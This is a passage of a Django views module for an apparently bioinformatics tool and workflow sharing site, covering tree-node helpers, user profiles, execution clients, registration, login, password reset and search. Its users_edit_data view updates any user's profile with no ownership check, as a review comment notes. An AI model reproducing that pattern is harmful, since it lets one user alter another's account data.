    The jstree text of a tool: "name/version/edit".
    '''
    return '{}/{}/{}'.format(tool.name, tool.version, tool.edit)
def tool_node_jstree(tool):
    '''
    The HTML for a jstree node that contains a tool.

    BUGFIX: the previous version ended the return statement with a stray
    trailing comma, so it returned a 1-element tuple instead of a string
    (unlike its sibling workflow_node_jstree).
    '''
    return tool_text_jstree(tool) + (' <span class="red lighten-3">DRAFT</span>' if tool.draft else '') + jstree_icon_html('tools')
def workflow_text_jstree(workflow):
    '''
    The jstree text of a workflow: "name/edit".
    '''
    return '{}/{}'.format(workflow.name, workflow.edit)
def workflow_node_jstree(workflow):
    '''
    The HTML for a jstree node that contains a workflow.
    '''
    draft_badge = ' <span class="red lighten-3">DRAFT</span>' if workflow.draft else ''
    return workflow_text_jstree(workflow) + draft_badge + jstree_icon_html('workflows')
def report_text_jstree(report):
    '''
    The jstree text of a report: "<workflow name>/<edit>/<nice_id>".
    '''
    prefix = workflow_text_jstree(report.workflow)
    return prefix + '/' + report.nice_id
def tool_id_jstree(tool, id_):
    '''
    The JS tree tool id.
    Return a JSON string so that it can have many fields.
    id_ distinguishes the jstree instance the node belongs to.
    '''
    #return tool_text_jstree(tool) + '/' + str(id_)
    return simplejson.dumps([tool.name, tool.version, str(tool.edit), str(id_)])
def tool_id_cytoscape(tool):
    '''
    The cytoscape node id of a tool (model instance or plain dict).
    '''
    if isinstance(tool, Tool):
        parts = [tool.name, tool.version, str(tool.edit)]
    elif type(tool) is dict:
        parts = [tool['name'], tool['version'], str(tool['edit'])]
    else:
        raise Exception('Error: 8151')
    return '__'.join(parts + [g['DEPENDENCY_TOOL_TREE_ID']])
def step_id_cytoscape(step_name, workflow, name, edit):
    '''
    The cytoscape node id of a workflow step.
    '''
    return '__'.join(['step', step_name, workflow_id_cytoscape(workflow, name, edit)])
def step_id_label(step_name):
    '''
    The cytoscape label of a step node.
    Currently this is simply the step's name.
    '''
    label = step_name
    return label
def tool_label_cytoscape(tool):
    '''
    The cytoscape label of a tool: "name/version/edit".
    Accepts either a Tool model instance or a plain dict with the same keys.
    Raises for any other input type.
    '''
    if isinstance(tool, Tool):
        parts = (tool.name, tool.version, str(tool.edit))
    elif type(tool) is dict:
        parts = (tool['name'], tool['version'], str(tool['edit']))
    else:
        raise Exception('Error: 9810')
    return '/'.join(parts)
def workflow_id_cytoscape(workflow, name, edit):
    '''
    The cytoscape id of a workflow: "<name>__<edit>".
    workflow may be a dict, a model instance, or falsy; when falsy the
    explicit name/edit arguments are used instead.
    '''
    if type(workflow) is dict:
        return workflow['name'] + '__' + str(workflow['edit'])
    if not workflow:
        return name + '__' + str(edit)
    return workflow.name + '__' + str(workflow.edit)
def workflow_label_cytoscape(workflow, name, edit):
    '''
    The cytoscape label of a workflow: "<name>/<edit>".
    Falls back to the explicit name/edit arguments when workflow is falsy.
    '''
    if not workflow:
        return name + '/' + str(edit)
    return workflow.name + '/' + str(workflow.edit)
def workflow_id_jstree(workflow, id_):
    '''
    The jstree id of a workflow node.
    Encoded as a JSON list so that one id string can carry several fields.
    '''
    fields = [workflow.name, str(workflow.edit), str(id_)]
    return simplejson.dumps(fields)
def report_id_jstree(report, id_):
    '''
    The jstree id of a report node.
    Encoded as a JSON list so that one id string can carry several fields:
    the owning workflow's identity, the report's nice_id and the node id.
    '''
    wf = report.workflow
    fields = [wf.name, str(wf.edit), str(report.nice_id), str(id_)]
    return simplejson.dumps(fields)
def tool_variable_node_jstree(variable):
    '''
    The jstree HTML for a tool variable node: "name:description" + icon.
    '''
    text = '{}:{}'.format(variable.name, variable.description)
    return text + jstree_icon_html('variables')
def tool_variable_id_jstree(variable, tool, id_):
    '''
    The jstree id of a tool-variable node.
    Returns a JSON list so that one id string can carry many fields:
    the variable's name/value/description, the node id, and the identity of
    the tool that owns the variable.
    '''
    fields = [
        variable.name, variable.value, variable.description,
        str(id_),
        tool.name, tool.version, tool.edit,
    ]
    return simplejson.dumps(fields)
def tool_get_dependencies_internal(tool, include_as_root=False):
    '''
    Flatten the dependency tree of a tool into a list of
    {'dependant': ..., 'dependency': ...} records (depth-first, recursive).
    include_as_root: when True, prepend a record for the tool itself with
    dependant=None ('dependant' needs dependencies..).
    '''
    records = [{'dependant': None, 'dependency': tool}] if include_as_root else []
    for child in tool.dependencies.all():
        records.append({'dependant': tool, 'dependency': child})
        # Recurse into the child's own dependencies (never re-adding it as root).
        records.extend(tool_get_dependencies_internal(child))
    return records
def tool_build_dependencies_jstree(tool_dependencies, add_variables=False, add_installation_commands=False):
    '''
    Build JS TREE from tool_dependencies
    add_variables: Also add tool/data variables
    add_installation_commands: All installation_commands + validation_commands + os_choices
    ATTENTION: THIS IS NOT GENERIC!!!
    IT uses g['DEPENDENCY_TOOL_TREE_ID'].

    tool_dependencies is a list of {'dependant': Tool-or-None, 'dependency': Tool}
    records, as produced by tool_get_dependencies_internal().
    Returns a flat list of jstree node dicts; the hierarchy is encoded through
    each node's 'parent' id, with '#' marking root nodes.
    '''
    tool_dependencies_jstree = []
    for tool_dependency in tool_dependencies:
        to_append = {
            'data': {
                # 'name': tool_dependency['dependency'].name,
                # 'version': tool_dependency['dependency'].version,
                # 'edit': tool_dependency['dependency'].edit,
                'type': 'tool',
            },
            'text': tool_node_jstree(tool_dependency['dependency']), # tool_text_jstree(tool_dependency['dependency']), # This is what is shown on the tree
            'cy_label': tool_label_cytoscape(tool_dependency['dependency']), # Label to show in the cytoscape graph
            'id': tool_id_jstree(tool_dependency['dependency'], g['DEPENDENCY_TOOL_TREE_ID']), # This is a unique id
            'parent': tool_id_jstree(tool_dependency['dependant'], g['DEPENDENCY_TOOL_TREE_ID']) if tool_dependency['dependant'] else '#',
            'type': 'tool', ### This is redundant with ['data']['type'], but we need it because
                            ### The node[0].data.type is checked in $scope.tools_var_jstree_model.
                            ### See also issue #93
            'name': tool_dependency['dependency'].name,
            'version': tool_dependency['dependency'].version,
            'edit': tool_dependency['dependency'].edit,
            'draft': tool_dependency['dependency'].draft,
        }
        if add_installation_commands:
            # Extra fields needed by the cytoscape drop target (see tool_get_dependencies).
            to_append['installation_commands'] = tool_dependency['dependency'].installation_commands
            to_append['validation_commands'] = tool_dependency['dependency'].validation_commands
            to_append['os_choices'] = [choice.os_choices for choice in tool_dependency['dependency'].os_choices.all()]
            to_append['dependencies'] = [str(t) for t in tool_dependency['dependency'].dependencies.all()]
        tool_dependencies_jstree.append(to_append)
        # Add the variables of this tool
        if add_variables:
            # Variable nodes hang under their owning tool's node.
            for variable in tool_dependency['dependency'].variables.all():
                tool_dependencies_jstree.append({
                    'data': {
                        'type': 'variable',
                        'name': variable.name,
                        'value': variable.value,
                        'description': variable.description,
                    },
                    'text': tool_variable_node_jstree(variable),
                    'id': tool_variable_id_jstree(variable, tool_dependency['dependency'], g['VARIABLES_TOOL_TREE_ID']),
                    'parent': tool_id_jstree(tool_dependency['dependency'], g['DEPENDENCY_TOOL_TREE_ID']),
                    'type': 'variable', # TODO: FIX REDUNDANCY WITH ['data']['type']
                })
    return tool_dependencies_jstree
### HELPING FUNCTIONS AND DECORATORS END #######
### VIEWS ############
def get_instance_settings():
    '''
    Return the settings of this local installation.
    We run multiple server instances for development; each instance has its
    own port, identified by the contents of an 'id.txt' file. When that file
    is missing, fall back to the 'default' settings (warning only once).
    '''
    id_filename = 'id.txt'
    if not os.path.exists(id_filename):
        # Warn only the first time the file is found to be missing.
        if not g['instance_setting_not_found_printed']:
            logger.warning('Could not find id.txt setting default')
            g['instance_setting_not_found_printed'] = True
        return g['instance_settings']['default']
    with open(id_filename) as id_file:
        instance_id = id_file.read().strip()
    return g['instance_settings'][instance_id]
### USERS
@has_data
def users_search_3(request, **kwargs):
    '''
    Get profile info for a single user.
    This is called from:
    * Click on profile
    * Click on a user node in left panel jstree
    '''
    username = kwargs.get('username', '')
    if not username:
        return fail('Could not get username')
    try:
        u = OBC_user.objects.get(user__username__iexact=username)
    except ObjectDoesNotExist as e:
        return fail('Could not find user with this username')
    ret = {
        'profile_username': username,
        'profile_firstname': u.first_name,
        'profile_lastname': u.last_name,
        'profile_website': u.website,
        'profile_affiliation': u.affiliation,
        'profile_publicinfo': u.public_info,
        'profile_created_at': datetime_to_str(u.user.date_joined), # https://docs.djangoproject.com/en/2.2/ref/contrib/auth/#django.contrib.auth.models.User.date_joined
    }
    # only for registered user:
    # * get mail
    # * get ExecutionClients
    if username == request.user.username:
        ret['profile_email'] = u.user.email
        ret['profile_clients'] = [{'name': client.name, 'client': client.client} for client in u.clients.all()]
    else:
        # Hide the email from everyone except the profile owner.
        ret['profile_email'] = ''
    return success(ret)
@has_data
def user_add_client(request, **kwargs):
    '''
    Called from $scope.profile_add_client when user adds a new Execution Client
    URL: user_add_client/
    Validates the name and URL, enforces per-user uniqueness and the maximum
    client count, then stores the client and returns the updated list.
    '''
    # Get the user
    try:
        obc_user = OBC_user.objects.get(user=request.user)
    except ObjectDoesNotExist:
        return fail('Error 8619'); # This should never happen
    #Get and validate the name
    name = kwargs.get('name', '')
    if not re.match(g['client_name_regex'], name):
        return fail('Invalid client name (allowed characters, a-z, A-Z, 0-9, _)')
    # Get and validate the client
    client = kwargs.get('client', '')
    if not valid_url(client):
        return fail('URL is invalid')
    # Check that the name and the client does not exist and that maximum number has not been reached
    existing_clients = [{'name':x.name, 'client': x.client} for x in obc_user.clients.all()]
    if len(existing_clients) >= g['client_max']:
        return fail('Maximum number of Execution Clients has been reached')
    existing_names = {x['name'] for x in existing_clients}
    existing_urls = {x['client'] for x in existing_clients}
    if name in existing_names:
        return fail('There is already an Execution Client with this name')
    if client in existing_urls:
        return fail('There is already an Execution Client with this URL')
    ## Add the execution environment
    new_execution_client = ExecutionClient(name=name, client=client)
    new_execution_client.save()
    obc_user.clients.add(new_execution_client)
    # Return all the profile clients
    # NOTE: 'client' is rebound by the comprehension below; the input value is no longer needed here.
    ret = {
        'profile_clients' : [{'name': client.name, 'client': client.client} for client in obc_user.clients.all()]
    }
    # NOTE(review): this save() looks redundant — .add() on the relation
    # persists on its own; confirm before removing.
    obc_user.save()
    return success(ret)
@has_data
def user_delete_client(request, **kwargs):
    '''
    Called from $scope.profile_delete_client
    URL: user_delete_client
    Deletes the named Execution Client of the logged-in user and returns the
    remaining client list.
    '''
    name = kwargs.get('name', '')
    if not name:
        return fail('Error 3498')
    # Get the user
    try:
        obc_user = OBC_user.objects.get(user=request.user)
    except ObjectDoesNotExist:
        return fail('Error 8686'); # This should never happen
    # Get the Execution Client
    try:
        ec = ExecutionClient.objects.get(obc_user=obc_user, name=name)
    except ObjectDoesNotExist as e:
        return fail('Error 4555')
    # Delete the Execution Client
    ec.delete()
    # Return all the profile clients
    ret = {
        'profile_clients' : [{'name': client.name, 'client': client.client} for client in obc_user.clients.all()]
    }
    return success(ret)
@has_data
def users_edit_data(request, **kwargs):
    '''
    Called by users_edit_data/
    Edit user's profile data
    Saves first/last name, website (must be a valid URL when given),
    affiliation and public info, then returns the fresh profile data.
    '''
    username = kwargs.get('username', '')
    if not username:
        return fail('Could not get username')
    try:
        obc_user = OBC_user.objects.get(user__username=username)
    except ObjectDoesNotExist as e:
        return fail('Could not find user with this username')
    # NOTE(review): no check here that request.user matches username —
    # presumably enforced elsewhere; confirm.
    obc_user.first_name = kwargs.get('profile_firstname', '')
    obc_user.last_name = kwargs.get('profile_lastname', '')
    website = kwargs.get('profile_website', '')
    if website:
        if not valid_url(website):
            return fail('website is not a valid URL')
    obc_user.website = website
    obc_user.affiliation = kwargs.get('profile_affiliation', '')
    obc_user.public_info = kwargs.get('profile_publicinfo', '')
    #Save edits
    obc_user.save()
    #Confirm by getting new data
    return users_search_3(request, **kwargs)
def users_search_2(
    main_search,
    ):
    '''
    Collect all users matching the main search string.
    Matches case-insensitively against username, affiliation and public info,
    and builds a flat jstree structure of the hits.
    '''
    query = (
        Q(user__username__icontains=main_search) |
        Q(affiliation__icontains=main_search) |
        Q(public_info__icontains=main_search)
    )
    results = OBC_user.objects.filter(query)
    users_search_jstree = [
        {
            'data': {'username': hit.user.username},
            'text': hit.user.username + jstree_icon_html('users'),
            'id': hit.user.username,
            'parent': '#',
            'state': { 'opened': True},
        }
        for hit in results
    ]
    return {
        'main_search_users_number': results.count(),
        'users_search_jstree': users_search_jstree,
    }
def get_scheme(request):
    '''
    http or https ?
    https://stackoverflow.com/a/36817763/5626738
    '''
    if request.is_secure():
        return 'https'
    return 'http'
def get_server_url(request):
    '''
    Build the full base URL of this server, e.g. "https://host/platform".
    '''
    return get_scheme(request) + '://' + request.get_host() + '/platform'
def get_execution_clients(request):
    '''
    Return all execution clients of the logged-in user as a list of
    {'client': ..., 'name': ...} dicts. Anonymous users have none.
    '''
    if request.user.is_anonymous:
        return []
    owner = OBC_user.objects.get(user=request.user)
    return list(owner.clients.values('client', 'name'))
def get_execution_clients_angular(request):
    '''
    Same as get_execution_clients, plus the empty trailing entry that the
    Angular frontend expects.
    '''
    clients = get_execution_clients(request)
    return clients + [{'name': '', 'client': ''}]
### END OF USERS
def index(request, **kwargs):
    '''
    View url: ''
    Main entry page. Parses the optional interlink kwargs (direct links to a
    tool / workflow / reference / user / comment / report), handles the email
    validation and password reset GET tokens, and renders the SPA template.
    '''
    context = {}
    context['general_alert_message'] = ''
    context['general_success_message'] = ''
    # Are we linking to a specific RO?
    init_interlink_args = {}
    # tool linking
    tool_name = kwargs.get('tool_name', '')
    tool_version = kwargs.get('tool_version', '')
    tool_edit = kwargs.get('tool_edit', 0)
    if tool_name and tool_version and tool_edit:
        if Tool.objects.filter(name=tool_name, version=tool_version, edit=int(tool_edit)).exists():
            init_interlink_args = {
                'type': 't',
                'name': tool_name,
                'version': tool_version,
                'edit': int(tool_edit),
            }
        else:
            context['general_alert_message'] = 'Tool {}/{}/{} does not exist'.format(tool_name, tool_version, tool_edit)
    # workflow linking
    workflow_name = kwargs.get('workflow_name', '')
    workflow_edit = kwargs.get('workflow_edit', 0)
    if workflow_name and workflow_edit:
        if Workflow.objects.filter(name=workflow_name, edit=int(workflow_edit)).exists():
            init_interlink_args = {
                'type': 'w',
                'name': workflow_name,
                'edit': int(workflow_edit),
            }
        else:
            context['general_alert_message'] = 'Workflow {}/{} does not exist'.format(workflow_name, workflow_edit)
    #references linking
    reference_name = kwargs.get('reference_name', '')
    if reference_name:
        if Reference.objects.filter(name__iexact=reference_name).exists():
            init_interlink_args = {
                'type': 'r',
                'name': reference_name,
            }
        else:
            context['general_alert_message'] = 'Reference {} does not exist'.format(reference_name)
    # user linking
    user_username = kwargs.get('user_username', '')
    if user_username:
        if OBC_user.objects.filter(user__username=user_username).exists():
            init_interlink_args = {
                'type': 'u',
                'username': user_username,
            }
        else:
            context['general_alert_message'] = 'User {} does not exist'.format(user_username)
    # comment link
    comment_id = kwargs.get('comment_id', '')
    if comment_id:
        if Comment.objects.filter(pk=int(comment_id)).exists():
            init_interlink_args = {
                'type': 'c',
                'id': int(comment_id),
            }
        else:
            context['general_alert_message'] = 'Comment with id={} does not exist'.format(comment_id)
    # Report link
    report_run = kwargs.get('report_run', '')
    if report_run:
        if Report.objects.filter(nice_id=report_run).exists():
            init_interlink_args = {
                'type': 'report',
                'run': report_run,
            }
        else:
            context['general_alert_message'] = 'Report {} does not exist'.format(report_run)
    context['init_interlink_args'] = simplejson.dumps(init_interlink_args)
    # Is this user already logged in?
    # https://stackoverflow.com/questions/4642596/how-do-i-check-whether-this-user-is-anonymous-or-actually-a-user-on-my-system
    if request.user.is_anonymous:
        username = ''
    else:
        username = request.user.username
    context['username'] = username
    context['password_reset_token'] = ''
    context['reset_signup_username'] = ''
    context['reset_signup_email'] = ''
    #Check for GET variables
    GET = request.GET
    # EMAIL VALIDATION
    validation_token = GET.get('validation_token', '')
    if validation_token:
        validation_success, validation_message = validate_user(validation_token)
        if validation_success:
            context['general_success_message'] = validation_message
        else:
            context['general_alert_message'] = validation_message
    #Is user validated
    context['user_is_validated'] = user_is_validated(request)
    # PASSWORD RESET
    password_reset_token = GET.get('password_reset_token', '')
    context['password_reset_token'] = '' # It will be set after checks
    if password_reset_token:
        password_reset_check_success, password_reset_check_message, obc_user = password_reset_check_token(password_reset_token)
        if password_reset_check_success:
            context['password_reset_token'] = password_reset_token
            context['reset_signup_username'] = obc_user.user.username
            context['reset_signup_email'] = obc_user.user.email
        else:
            context['general_alert_message'] = password_reset_check_message
    # Show warning when running in default Django port
    port = int(request.META['SERVER_PORT'])
    if settings.DEBUG:
        # Running with DEBUG True
        if port == 8000:
            logger.warning('WARNING: YOU ARE RUNNING IN DEFAULT DJANGO PORT (8000)')
        if port != g['DEFAULT_DEBUG_PORT']:
            # BUGFIX: the original f-string nested single quotes inside single
            # quotes (f'...{g['DEFAULT_DEBUG_PORT']}') — a SyntaxError before
            # Python 3.12. Also fixed the 'runining' typo in the message.
            logger.warning('WARNING: You are not running on port {}'.format(g['DEFAULT_DEBUG_PORT']))
    context['debug'] = settings.DEBUG # If this is True, then we include tests.js
    # Add port information or other instance settings on template
    instance_settings = get_instance_settings()
    context['port'] = instance_settings['port']
    context['controller_url'] = instance_settings['controller_url']
    # Get OS choices
    context['os_choices'] = simplejson.dumps(OS_types.get_angular_model())
    # Get User clients
    context['profile_clients'] = get_execution_clients_angular(request)
    # Add version
    context['version'] = __version__
    return render(request, 'app/index.html', context)
@has_data
def register(request, **kwargs):
    '''
    View url: 'register/'
    add user add
    Validates username / password / email, sends the validation email, and
    creates the User + OBC_user records.
    '''
    if not 'signup_username' in kwargs:
        return fail('username is required')
    signup_username = kwargs['signup_username']
    if not re.match(r'^\w+$', signup_username):
        return fail('username can only contain alphanumeric characters')
    if username_exists(signup_username):
        return fail('username: {} exists already'.format(signup_username))
    if not 'signup_password' in kwargs:
        return fail('password is required')
    signup_password = kwargs['signup_password']
    check_password_success, check_password_message = check_password(signup_password)
    if not check_password_success:
        return fail(check_password_message)
    if not 'signup_confirm_password' in kwargs:
        return fail('confirm password is required')
    signup_confirm_password = kwargs['signup_confirm_password']
    if signup_password != signup_confirm_password:
        return fail('Confirm password does not match password')
    if not 'signup_email' in kwargs:
        return fail('email is required')
    signup_email = kwargs['signup_email'] # https://www.tecmint.com/setup-postfix-mail-server-in-ubuntu-debian/
    ## Do we allow users with the same email address?
    try:
        OBC_user.objects.get(user__email = signup_email)
    except ObjectDoesNotExist:
        pass # This is ok! No user with this email exists yet.
    else:
        # An exception did NOT happen (as it should)
        return fail('A user with this email already exists')
    ## smtplib method (kept for reference; superseded by django send_mail below)
    # try:
    #     send_mail(
    #         from_=g['EMAIL'],
    #         to=signup_email,
    #         subject='[{server}] Please confirm your email'.format(server=g['SERVER']),
    #         body=confirm_email_body(uuid_token, port=request_port_to_url(request)),
    #     )
    # except smtplib.SMTPRecipientsRefused:
    #     return fail('Could not sent an email to {}'.format(signup_email))
    # except Exception as e:
    #     pass ## FIXME
    ## django send_mail
    suc, error_message, uuid_token = send_validation_email_inner(request, signup_email)
    if not suc:
        return fail(error_message)
    #Create user
    user = User.objects.create_user(signup_username, signup_email, signup_password, last_login=now()) # https://stackoverflow.com/questions/33683619/null-value-in-column-last-login-violates-not-null-constraint/42502311
    #Create OBC_user
    #If we are running in DEBUG, then new users are validated. If we set this to False then we need a send mail service to testing platform
    #In production new users are not validated by default
    obc_user = OBC_user(user=user, email_validated=bool(settings.DEBUG), email_validation_token=uuid_token)
    obc_user.save()
    return success()
@has_data
def reset_password_email(request, **kwargs):
    '''
    Send a password-reset email.
    Looks up the user by email, stores a fresh reset token + timestamp on the
    OBC_user record, and emails the reset link.
    '''
    if not 'reset_password_email' in kwargs:
        return fail('Please enter an email')
    email = kwargs['reset_password_email']
    try:
        obc_user = OBC_user.objects.get(user__email=email)
    except ObjectDoesNotExist:
        obc_user = None
    if not obc_user:
        return fail('This email does not belong to any user') # Isn't this a breach of privacy?
    # reset_password_email_body
    # Save token
    token = create_uuid_token()
    obc_user.password_reset_token = token
    obc_user.password_reset_timestamp = now()
    obc_user.save()
    # #Send email with SMTPLIB (kept for reference; superseded by django send_mail below)
    # try:
    #     send_mail(
    #         from_ = g['EMAIL'],
    #         to = email,
    #         subject = '[{server}] Reset your password'.format(server=g['SERVER']),
    #         body = reset_password_email_body(token, port=request_port_to_url(request))
    #     )
    # except smtplib.SMTPRecipientsRefused:
    #     return fail('Could not send an email to: {}'.format(email))
    # except Exception as e:
    #     pass # FIX ME
    # With Django send_mail
    try:
        send_mail(
            '[{server}] Reset your password'.format(server=g['SERVER']), # subject
            reset_password_email_body(token, port=request_port_to_url(request)), # body message
            g['EMAIL'], # from
            [email], # to
        )
    except Exception as e:
        return fail('Could not send email to {email}. Please contact {ADMIN}'.format(email=email, ADMIN=g['ADMIN']))
    return success()
@has_data
def password_reset(request, **kwargs):
    '''
    Apply a password reset: validate the new password, set it on the user
    identified by the reset token, then invalidate the token.
    '''
    if not 'password_reset_password' in kwargs:
        return fail('password is required')
    password_reset_password = kwargs['password_reset_password']
    if not 'password_reset_confirm_password' in kwargs:
        return fail('confirm password is required')
    password_reset_confirm_password = kwargs['password_reset_confirm_password']
    if password_reset_password != password_reset_confirm_password:
        return fail('Confirm password does not match password')
    check_password_success, check_password_message = check_password(password_reset_password)
    if not check_password_success:
        return fail(check_password_message)
    password_reset_token = kwargs['password_reset_token'] # This should be always present in kwargs
    #Change the password
    obc_user = OBC_user.objects.get(password_reset_token=password_reset_token)
    user = obc_user.user
    user.set_password(password_reset_password) # https://docs.djangoproject.com/en/2.1/topics/auth/default/
    user.save()
    #Invalidate token (one-shot: the same link cannot be used twice)
    obc_user.password_reset_token = None
    obc_user.save()
    return success()
@has_data
def send_validation_email(request, **kwargs):
    '''
    url: send_validation_email/
    Re-send the email validation mail to the logged-in user and store the new
    validation token on the OBC_user record.
    '''
    if request.user.is_anonymous:
        return fail('Error 8912'); # This should never happen
    try:
        obc_user = OBC_user.objects.get(user=request.user)
    except ObjectDoesNotExist:
        return fail('Error 8711'); # This should never happen
    email = request.user.email
    suc, error_message, uuid_token = send_validation_email_inner(request, email)
    if not suc:
        return fail(error_message)
    #Set the validation token
    obc_user.email_validation_token = uuid_token
    obc_user.save()
    #print ('Validation token:', uuid_token)
    ret = {
        'email': request.user.email
    }
    return success(ret)
@has_data
def login(request, **kwargs):
    '''
    View url: 'login/'
    Authenticate and log the user in. Returns the fresh CSRF token (it
    changes after login), the validation state and the execution clients.
    '''
    if not 'login_username' in kwargs:
        return fail('username is required')
    login_username = kwargs['login_username']
    if not 'login_password' in kwargs:
        return fail('password is required')
    login_password = kwargs['login_password']
    user = authenticate(username=login_username, password=login_password)
    if user is None:
        return fail('Invalid username or password')
    django_login(request, user)
    obc_user = OBC_user.objects.get(user=user)
    #print ('LOGIN: user_is_validated', obc_user.email_validated)
    # Since we logged in the csrf token has changed.
    ret = {
        'username': login_username,
        'csrf_token': get_token(request),
        'user_is_validated': obc_user.email_validated,
        'profile_clients': get_execution_clients_angular(request),
    }
    return success(ret)
def logout(request):
    '''
    View url: 'logout/'
    This is NOT called by AJAX.
    Ends the Django session and redirects to the platform root.
    '''
    django_logout(request)
    return redirect('/platform/')
#def user_data_get(request):
# '''
# View url: user_data_get
# GET THE DATA OF THE LOGGED-IN USER
# It does not have the @has_data decorator because it has.. no data
# '''
#
# user = request.user
# obc_user = OBC_user.objects.get(user=user)
# ret = {
# 'user_first_name': obc_user.first_name,
# 'user_last_name': obc_user.last_name,
# 'user_email': user.email,
# 'user_website': obc_user.website,
# 'user_public_info': obc_user.public_info,
# }
#
# return success(ret)
#@has_data
#def user_data_set(request, **kwargs):
# '''
# Deprecated
# '''
# user = request.user
# obc_user = OBC_user.objects.get(user=user)
#
# obc_user.first_name = None_if_empty_or_nonexisting(kwargs, 'user_first_name')
# obc_user.last_name = None_if_empty_or_nonexisting(kwargs, 'user_last_name')
# obc_user.website = None_if_empty_or_nonexisting(kwargs, 'user_website')
# obc_user.public_info = None_if_empty_or_nonexisting(kwargs, 'user_public_info')
#
# obc_user.save()
#
# return success()
@has_data
def tools_search_1(request, **kwargs):
    '''
    Get tool counts
    NOT CURRENTLY USED!
    Returns the total number of tools and workflows.
    (Removed the unused local `queries` list — dead code.)
    '''
    ret = {
        'tools_search_tools_number': Tool.objects.count(),
        'workflows_search_tools_number': Workflow.objects.count(),
    }
    return success(ret)
def tools_search_2(tools_search_name, tools_search_version, tools_search_edit):
    '''
    This is triggered when there is a key-change on the main-search
    Builds Q filters (name OR author username, version, edit), fetches the
    matching tools and returns the jstree model plus the hit count.
    '''
    Qs = []
    if tools_search_name:
        # Match either the tool's name or its author's username.
        Q1 = Q(name__icontains=tools_search_name)
        Q2 = Q(obc_user__user__username__icontains=tools_search_name)
        Qs.append(Q1 | Q2)
    if tools_search_version:
        Qs.append(Q(version__icontains=tools_search_version))
    if tools_search_edit:
        Qs.append(Q(edit = int(tools_search_edit)))
    # This applies an AND operator. https://docs.djangoproject.com/en/2.2/topics/db/queries/#complex-lookups-with-q-objects
    # For the order_by part see issue #120
    results = Tool.objects.filter(*Qs).order_by('created_at')
    # { id : 'ajson1', parent : '#', text : 'KARAPIPERIM', state: { opened: true} }
    # Build JS TREE structure; forked tools hang under the tool they were forked from.
    tools_search_jstree = []
    for x in results:
        to_add = {
            'data': {'name': x.name, 'version': x.version, 'edit': x.edit},
            'text': tool_node_jstree(x), # tool_text_jstree(x) + (' <span class="red lighten-3">DRAFT</span>' if x.draft else '') + jstree_icon_html('tools'),
            'id': tool_id_jstree(x, g['SEARCH_TOOL_TREE_ID']),
            'parent': tool_id_jstree(x.forked_from, g['SEARCH_TOOL_TREE_ID']) if x.forked_from else '#',
            'state': { 'opened': True},
        }
        tools_search_jstree.append(to_add)
    ret = {
        'tools_search_tools_number' : results.count(),
        #'tools_search_list': [{'name': x.name, 'version': x.version, 'edit': x.edit} for x in results], # We do not need a list, we need a tree!
        'tools_search_jstree' : tools_search_jstree,
    }
    return ret
def workflows_search_2(workflows_search_name, workflows_search_edit):
    '''
    Called by all_search_2
    Builds Q filters (name OR author username, edit), fetches the matching
    workflows and returns the jstree model plus the hit count.
    '''
    Qs = []
    #workflows_search_name = kwargs.get('workflows_search_name', '')
    if workflows_search_name:
        # Match either the workflow's name or its author's username.
        Q1 = Q(name__icontains=workflows_search_name)
        Q2 = Q(obc_user__user__username__icontains=workflows_search_name)
        Qs.append(Q1 | Q2)
    #workflows_search_edit = kwargs.get('workflows_search_edit', '')
    if workflows_search_edit:
        Qs.append(Q(edit = int(workflows_search_edit)))
    # For the order_by part see issue #120
    results = Workflow.objects.filter(*Qs).order_by('created_at')
    # Build JS TREE structure; forked workflows hang under their origin workflow.
    workflows_search_jstree = []
    for x in results:
        to_add = {
            'data': {'name': x.name, 'edit': x.edit},
            'text': workflow_node_jstree(x),
            'id': workflow_id_jstree(x, g['SEARCH_WORKFLOW_TREE_ID']),
            'parent': workflow_id_jstree(x.forked_from, g['SEARCH_WORKFLOW_TREE_ID']) if x.forked_from else '#',
            'state': { 'opened': True},
        }
        workflows_search_jstree.append(to_add)
    ret = {
        'workflows_search_tools_number' : results.count(),
        'workflows_search_jstree' : workflows_search_jstree,
    }
    return ret
@has_data
def tools_search_3(request, **kwargs):
    '''
    Triggered when a tool is clicked on the tool-search-jstree
    Returns everything the UI needs to display the tool: metadata, dependency
    and variable jstrees, validation state, votes and the comment thread.
    '''
    tool_name = kwargs.get('tool_name', '')
    tool_version = kwargs.get('tool_version', '')
    tool_edit = int(kwargs.get('tool_edit', -1))
    tool = Tool.objects.get(name__iexact=tool_name, version__iexact=tool_version, edit=tool_edit)
    #Get the dependencies of this tool and build a JSTREE
    tool_dependencies_jstree = []
    for dependency in tool.dependencies.all():
        dependency_js_tree = tool_build_dependencies_jstree(tool_get_dependencies_internal(dependency, include_as_root=True))
        tool_dependencies_jstree.extend(dependency_js_tree)
    #Get the dependencies of this tool AND the variables and build a JSTREE
    #FIXME: Duplicate code
    tool_variables_jstree = []
    for dependency in tool.dependencies.all():
        variables_js_tree = tool_build_dependencies_jstree(tool_get_dependencies_internal(dependency, include_as_root=True), add_variables=True)
        tool_variables_jstree.extend(variables_js_tree)
    #Get the variables of this tool
    tool_variables = []
    for variable in tool.variables.all():
        tool_variables.append({'name': variable.name, 'value': variable.value, 'description': variable.description})
    # Get obc_user (None for anonymous visitors)
    if request.user.is_anonymous:
        obc_user = None
    else:
        obc_user = OBC_user.objects.get(user=request.user)
    #Is it voted?
    if obc_user:
        try:
            v = UpDownToolVote.objects.get(obc_user=obc_user, tool=tool)
        except ObjectDoesNotExist as e:
            # It is not voted
            tool_voted = {'up': False, 'down': False}
        else:
            # It is voted: a single vote record is either an up- or a downvote.
            tool_voted = {'up': v.upvote, 'down': not v.upvote}
    else:
        # Anonymous users have no votes.
        tool_voted = {'up': False, 'down': False}
    ret = {
        'website': tool.website,
        'description': tool.description,
        'description_html': tool.description_html,
        'username': tool.obc_user.user.username,
        'created_at': datetime_to_str(tool.created_at),
        'forked_from': tool_to_json(tool.forked_from),
        'changes': tool.changes,
        'tool_keywords': [keyword.keyword for keyword in tool.keywords.all()],
        'dependencies_jstree': tool_dependencies_jstree,
        'variables_js_tree': tool_variables_jstree,
        'variables': tool_variables,
        'tool_os_choices': OS_types.get_angular_model([x.os_choices for x in tool.os_choices.all()]),
        'installation_commands': tool.installation_commands,
        'validation_commands': tool.validation_commands,
        'validation_status': tool.last_validation.validation_status if tool.last_validation else 'Unvalidated',
        # Show stdout, stderr and error code when the tool is clicked on the tool-search-jstree
        'stdout' : tool.last_validation.stdout if tool.last_validation else None,
        'stderr' : tool.last_validation.stderr if tool.last_validation else None,
        'errcode' : tool.last_validation.errcode if tool.last_validation else None,
        'validation_created_at' : datetime_to_str(tool.last_validation.created_at) if tool.last_validation else None,
